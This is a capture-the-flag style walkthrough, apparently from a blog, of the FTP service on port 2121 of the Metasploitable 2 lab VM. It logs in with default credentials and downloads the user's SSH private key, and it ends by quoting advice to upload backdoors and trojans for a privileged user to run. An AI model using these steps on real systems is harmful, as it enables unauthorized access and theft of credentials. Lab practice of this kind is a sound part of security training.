The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1
The Nessus report on Port 2121 had this to say:
2121/tcpFTP Supports Clear Text Authentication
Synopsis
Authentication credentials might be intercepted.
Description
The remote FTP server allows the user’s name and password to be transmitted in clear text, which could be intercepted by a network sniffer or a man-in-the-middle attack.
In truth none of this information helped me and I was unable to find a Metasploit exploit that related to version 1.3.1. Other version attacks were available.
I had a look for exploits in the wild, but again, couldn’t figure out their application.
Most of the guidance online talks of using a password cracking tool for this ftp service; however, I’m going to skip that and presume that within the context of previous exploits we have already enumerated user names and passwords.
So, to log in via the attacking Terminal. We will use the credentials of msfadmin/msfadmin for username/password:
~# ftp 192.168.1.103 2121 Connected to 192.168.1.103. 220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.1.103] Name (192.168.1.103:root): msfadmin 331 Password required for msfadmin Password: 230 User msfadmin logged in Remote system type is UNIX. Using binary mode to transfer files.
Then we can have a look at files:
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwx------ 2 msfadmin msfadmin 4096 Nov 14 11:25 .gconfd
drwx------ 2 msfadmin msfadmin 4096 Nov 14 11:25 .gconf
drwxr-xr-x 7 msfadmin msfadmin 4096 Nov 13 11:25 .
-rwx------ 1 msfadmin msfadmin 4 May 20 2012 .rhosts
-rw------- 1 root root 4174 May 14 2012 .mysql_history
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
drwx------ 2 msfadmin msfadmin 4096 May 18 2010 .ssh
-rw-r--r-- 1 msfadmin msfadmin 0 May 7 2010 .sudo_as_admin_successful
drwxr-xr-x 6 msfadmin msfadmin 4096 Apr 28 2010 vulnerable
drwxr-xr-x 4 msfadmin msfadmin 4096 Apr 17 2010 .distcc
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 .profile
226 Transfer complete
And download some files for further investigation:
ftp> get .bash_history local: .bash_history remote: .bash_history 200 PORT command successful 550 .bash_history: Not a regular file ftp> get .profile local: .profile remote: .profile 200 PORT command successful 150 Opening BINARY mode data connection for .profile (586 bytes) 226 Transfer complete 586 bytes received in 0.01 secs (89.9 kB/s)
We can navigate to .ssh and look for files:
ftp> cd .ssh 250 CWD command successful ftp> ls -lat 200 PORT command successful 150 Opening ASCII mode data connection for file list drwxr-xr-x 7 msfadmin msfadmin 4096 Nov 13 11:25 .. drwx------ 2 msfadmin msfadmin 4096 May 18 2010 . -rw------- 1 msfadmin msfadmin 1675 May 18 2010 id_rsa -rw-r--r-- 1 msfadmin msfadmin 405 May 18 2010 id_rsa.pub -rw-r--r-- 1 msfadmin msfadmin 609 May 7 2010 authorized_keys 226 Transfer complete
And then download the key pair:
ftp> get id_rsa local: id_rsa remote: id_rsa 200 PORT command successful 150 Opening BINARY mode data connection for id_rsa (1675 bytes) 226 Transfer complete 1675 bytes received in 0.02 secs (88.6 kB/s) ftp> get id_rsa.pub local: id_rsa.pub remote: id_rsa.pub 200 PORT command successful 150 Opening BINARY mode data connection for id_rsa.pub (405 bytes) 226 Transfer complete 405 bytes received in 0.00 secs (275.4 kB/s) ftp>
Hat-tip to the iPositive Security Blog who concludes with:
The user has Read/Write privileges using FTP service. Even though these users are non-root accounts, and have RW privs in their home directories, we have gained a foothold into the target. This is also applicable to other system / network services such as samba [ file sharing ] or ssh [ remote access ]. Using these accounts, it is now possible for us to explore the file system, configuration(s), set up, any specific software(s) / applications that are installed and may be vulnerable. Also a good idea is to upload backdoor / malware / trojan / privilege escalation exploit(s) on the server. The expectation is to wait for some user, usually root or root privileged user, to access these malicious exes and run them. Once the exe runs, depending upon its function, a variety of actions can be performed. Actions can include and are not limited to gaining shell, execute commands, sniff sensitive data off the wire and send the logs to the attacker, enumerate other systems in the network environment for further exploitation etc, and many more.